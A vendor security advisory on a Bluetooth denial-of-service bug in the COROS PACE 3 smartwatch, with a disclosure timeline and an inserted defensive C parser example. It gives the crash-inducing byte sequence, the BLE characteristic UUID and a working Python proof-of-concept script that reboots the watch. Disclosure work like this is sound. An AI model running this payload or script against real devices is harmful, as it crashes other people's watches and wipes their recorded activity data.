Advisory ID: SYSS-2025-027
Product: COROS PACE 3
Manufacturer: COROS Wearables, Inc.
Affected Version(s): <= V 3.0808.0
Tested Version(s): V 3.0808.0
Vulnerability Type: NULL Pointer Dereference (CWE-476)
Risk Level: Medium
Solution Status: Not yet fixed
Manufacturer Notification: 2025-03-14
Solution Date: N.A.
Public Disclosure: 2025-06-17
CVE Reference: CVE-2025-48705
Author of Advisory: Moritz Abrell, SySS GmbH
                    Jan Wütherich, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an
even more powerful punch. Track your training and recovery with a watch
that's lightweight and comfortable, with advanced technology,
outstanding data accuracy, and backed by the industry-leading COROS
training software system. The COROS PACE 3 paves the way to discover
your potential."

Due to a NULL pointer dereference vulnerability, sending a specially
crafted Bluetooth Low Energy (BLE) message forces the device to reboot.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Connecting to the COROS PACE 3 and writing, e.g., the byte sequence
"0x7900ff00002e" to the characteristic with the UUID
"6e400002-b5a3-f393-e0a9-77757c7f7f70" forces the watch to reboot.

If exploited during an ongoing activity, the activity is terminated and
the recorded data is lost.

Packets beginning with 0x79 are for notifications and use the following
basic structure (field offsets in bits):

 0      8           24         n
+------+-----------+-----------+
| 0x79 |  Unknown  |  Payload  |
+------+-----------+-----------+

The payload is copied to the heap and parsed.
It contains three different lines for the notification (L0, L1 and L2);
each line consists of a 4-bit type, a 12-bit size and n bytes of data:

    4         12        n         4         12        n         4         12        n
+---------+---------+---------+---------+---------+---------+---------+---------+---------+
| L0 type | L0 size | L0 data | L1 type | L1 size | L1 data | L2 type | L2 size | L2 data |
+---------+---------+---------+---------+---------+---------+---------+---------+---------+

A typical message would look as follows:

  4     12         n          4     12       n       4     12         n
+-----+-------+--------------+-----+-------+--------+-----+-------+----------------+
|  0  |  00C  | com.whatsapp |  1  |  006  | HACKED |  2  |  011  | Hacked by SySS |
+-----+-------+--------------+-----+-------+--------+-----+-------+----------------+

Each line type corresponds to its line number: type 0 for the first
line, type 1 for the second, and type 2 for the third.

If the L1 data content starts with a null terminator, the L0 data,
without the "com." prefix, is copied to its place. The code for this
looks similar to the following:

    if (*l1_data == '\0') {
        char* name = strrchr(l0_data, '.');
        memcpy(l1_data, name + 1, strlen(name));
    }

Modifying the L1 type to 2 instead of 1 causes L1 to be skipped, so
l1_data stays NULL. Since the above code is still executed, the NULL
pointer is dereferenced, causing a crash.
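The following is an added example, not code from the advisory or from the COROS firmware: a parser for the L0/L1/L2 line structure described above together with the fill-in step, written the way a defender would want it, so that a payload whose type-1 line is missing is rejected instead of dereferenced. The big-endian header layout, the 64-byte per-line buffers and the function names are assumptions; the advisory only gives the field widths.

```c
#include <string.h>
#define MAX_LINE 64
typedef struct {
    int present[3];          /* set when a line of that type was parsed */
    char data[3][MAX_LINE];  /* NUL-terminated line text */
} notification_t;

/* Parse the L0/L1/L2 triplets: a 16-bit big-endian header (type in the top nibble,
 * size in the low 12 bits) followed by `size` data bytes. Byte order is an assumption. */
int parse_notification(const unsigned char *p, size_t len, notification_t *n)
{
    size_t off = 0;
    memset(n, 0, sizeof *n);
    while (off + 2 <= len) {
        unsigned type = p[off] >> 4;
        size_t size = ((size_t)(p[off] & 0x0f) << 8) | p[off + 1];
        off += 2;
        if (type > 2 || size >= MAX_LINE || off + size > len)
            return -1;           /* unknown type or size beyond the buffer */
        memcpy(n->data[type], p + off, size);
        n->data[type][size] = '\0';
        n->present[type] = 1;
        off += size;
    }
    return off == len ? 0 : -1;  /* trailing bytes without a full header */
}
/* The fill-in step from the advisory with the missing check added: the original
 * dereferences l1_data even when no type-1 line was parsed (l1_data == NULL). */
int fill_default_title(notification_t *n)
{
    if (!n->present[0] || !n->present[1]) return -1;  /* crash case: L1 absent */
    if (n->data[1][0] != '\0') return 0;              /* L1 already has a title */
    const char *dot = strrchr(n->data[0], '.');
    const char *name = dot ? dot + 1 : n->data[0];    /* no '.' is fine too */
    memcpy(n->data[1], name, strlen(name) + 1);       /* both are MAX_LINE wide */
    return 0;
}
/* Constructed payloads: well-formed, and the same bytes with L1's type set to 2. */
const unsigned char PAYLOAD_OK[]  = {0x00,0x0c,'c','o','m','.','w','h','a','t','s','a','p','p',
                                     0x10,0x00, 0x20,0x03,'a','b','c'};
const unsigned char PAYLOAD_BAD[] = {0x00,0x0c,'c','o','m','.','w','h','a','t','s','a','p','p',
                                     0x20,0x00, 0x20,0x03,'a','b','c'};
/* Returns the title the watch would show, or NULL when the payload is rejected. */
const char *handle(const unsigned char *p, size_t len)
{
    static notification_t n;
    if (parse_notification(p, len, &n) != 0 || fill_default_title(&n) != 0) return NULL;
    return n.data[1];
}
```

With PAYLOAD_OK the empty L1 is filled with "whatsapp"; with PAYLOAD_BAD the second type-2 line overwrites the first, no type-1 line is ever recorded, and handle() returns NULL where the watch's code would have crashed.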
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following proof-of-concept script connects to a COROS PACE 3 and
triggers the denial-of-service vulnerability:

####################
import asyncio
from bleak import BleakClient
import sys

DEVICE_ADDRESS = "F7:AF:1D:27:03:b0"
CHARACTERISTIC_UUID = "6e400002b5a3f393e0a977757c7f7f70"
DATA = bytes.fromhex("7900ff00002e")


async def write_to_ble_device():
    client = BleakClient(DEVICE_ADDRESS)
    try:
        await client.connect()
        await asyncio.sleep(2)
        if client.is_connected:
            print(f"connected to {DEVICE_ADDRESS}")
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA, response=False)
    except Exception as e:
        print(f"Error: {e}")
    finally:
        if client.is_connected:
            await client.disconnect()


asyncio.run(write_to_ble_device())
####################

# Executing the script results in a reboot of the watch:
$ python3 poc.py

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Not yet fixed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Asked once again for an update
2025-04-15: Answer received from the manufacturer; manufacturer informed
            SySS GmbH that a fix is planned for June, 2025
2025-04-15: Receipt confirmed
2025-05-26: More detailed information provided to the manufacturer
2025-05-26: Manufacturer confirmed receipt
2025-06-17: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-027.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2025-48705
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48705
[5] Detailed blog post
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell and Jan Wütherich
of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en